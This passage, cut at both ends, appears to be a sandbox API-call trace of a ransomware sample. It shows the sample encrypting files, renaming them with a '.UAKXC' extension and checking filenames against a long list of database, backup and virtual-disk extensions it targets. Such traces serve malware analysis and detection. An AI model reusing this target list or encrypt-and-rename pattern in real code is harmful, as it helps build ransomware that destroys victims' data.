lpNumberOfBytesWritten=0x3abfc44, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc44*=0x14c, lpOverlapped=0x0) returned 1 [0140.985] CloseHandle (hObject=0x6c4) returned 1 [0140.987] GetProcessHeap () returned 0xea0000 [0140.987] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef34d0 [0140.987] lstrcpyW (in: lpString1=0xef34d0, lpString2="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn" [0140.987] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn.UAKXC" [0140.987] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn.uakxc")) returned 1 [0140.988] GetProcessHeap () returned 0xea0000 [0140.988] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef34d0 | out: hHeap=0xea0000) returned 1 [0140.988] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeed88 | out: hHeap=0xea0000) returned 1 [0140.988] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2588 | out: hHeap=0xea0000) returned 1 [0140.988] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0140.988] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0140.988] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0140.989] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn")) returned 0x2022 [0140.989] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0140.990] GetLastError () returned 0x0 [0140.990] GetFileSizeEx (in: hFile=0x6c4, lpFileSize=0x3abfc88 | out: lpFileSize=0x3abfc88*=314) returned 1 [0140.990] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0140.990] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0140.990] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0140.990] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0140.990] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".accde") returned 0x0 [0140.990] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0140.990] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0140.990] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".accft") returned 0x0 [0140.990] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".adb") returned 0x0 [0140.990] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".ade") returned 0x0 [0140.990] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".adf") returned 0x0 [0140.990] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".adp") returned 0x0 [0140.990] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".arc") returned 0x0 [0140.990] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".ora") returned 0x0 [0140.990] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".alf") returned 0x0 [0140.991] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".ask") returned 0x0 [0140.991] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".btr") returned 0x0 [0140.991] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0140.991] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".cat") returned 0x0 [0140.991] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0140.991] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0140.991] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".cma") returned 0x0 [0140.991] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0140.991] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0140.991] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".dad") returned 0x0 [0140.991] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0140.991] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0140.991] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".db") returned 0x0 [0140.991] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0140.991] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0140.991] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".db3") returned 0x0 [0140.991] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0140.991] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0140.991] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0140.991] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0140.992] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0140.992] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0140.992] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0140.992] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".dct") returned 0x0 [0140.992] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0140.992] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0140.992] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0140.992] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0140.992] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0140.992] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0140.992] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0140.992] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0140.992] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0140.992] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".eco") returned 0x0 [0140.992] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0140.992] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".edb") returned 0x0 [0140.992] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".epim") returned 0x0 [0140.992] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".exb") returned 0x0 [0140.992] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0140.992] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0140.992] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".fic") returned 0x0 [0140.993] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0140.993] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0140.993] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0140.993] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".fol") returned 0x0 [0140.993] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0140.993] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0140.993] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0140.993] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0140.993] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0140.993] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".frm") returned 0x0 [0140.993] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0140.993] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0140.993] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0141.034] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0141.034] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".his") returned 0x0 [0141.034] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".ib") returned 0x0 [0141.034] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".idb") returned 0x0 [0141.034] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0141.034] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0141.034] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".itw") returned 0x0 [0141.034] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".jet") returned 0x0 [0141.035] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0141.035] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.035] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0141.035] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0141.035] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0141.035] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0141.035] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0141.035] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".maf") returned 0x0 [0141.035] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".maq") returned 0x0 [0141.035] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".mar") returned 0x0 [0141.035] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".mas") returned 0x0 [0141.035] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".mav") returned 0x0 [0141.035] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0141.035] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0141.035] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0141.035] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0141.035] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".mud") returned 0x0 [0141.035] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0141.036] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".myd") returned 0x0 [0141.036] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0141.036] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0141.036] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0141.036] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0141.036] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0141.036] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0141.036] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0141.036] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".nv") returned 0x0 [0141.036] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0141.036] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0141.036] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0141.036] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".odb") returned 0x0 [0141.036] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0141.036] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".orx") returned 0x0 [0141.036] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".owc") returned 0x0 [0141.036] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".p96") returned 0x0 [0141.036] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".p97") returned 0x0 [0141.036] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".pan") returned 0x0 [0141.037] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0141.037] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0141.037] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0141.037] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".qry") returned 0x0 [0141.037] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0141.037] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0141.037] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0141.037] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".rod") returned 0x0 [0141.037] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0141.037] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0141.037] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0141.037] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0141.037] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0141.037] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".scx") returned 0x0 [0141.037] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0141.037] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0141.037] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0141.037] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".sis") returned 0x0 [0141.038] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".spq") returned 0x0 [0141.038] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".sql") returned 0x0 [0141.038] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0141.038] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0141.038] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0141.038] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".te") returned 0x0 [0141.038] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".temx") returned 0x0 [0141.038] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0141.038] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".tps") returned 0x0 [0141.038] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".trc") returned 0x0 [0141.038] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".trm") returned 0x0 [0141.038] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".udb") returned 0x0 [0141.038] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".udl") returned 0x0 [0141.038] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".usr") returned 0x0 [0141.039] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".v12") returned 0x0 [0141.039] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".vis") returned 0x0 [0141.039] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0141.039] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0141.039] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0141.039] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0141.039] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0141.039] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0141.039] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".xld") returned 0x0 [0141.039] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0141.039] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0141.039] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".abs") returned 0x0 [0141.039] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".abx") returned 0x0 [0141.039] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0141.039] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".adn") returned 0x0 [0141.040] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".db2") returned 0x0 [0141.040] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0141.040] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0141.040] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".icg") returned 0x0 [0141.040] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".icr") returned 0x0 [0141.040] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.040] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".lut") returned 0x0 [0141.040] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".maw") returned 0x0 [0141.040] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0141.040] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0141.041] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0141.041] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0141.041] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0141.041] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0141.041] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0141.041] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0141.041] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0141.041] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0141.041] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0141.041] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".raw") returned 0x0 [0141.041] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0141.041] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0141.041] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", 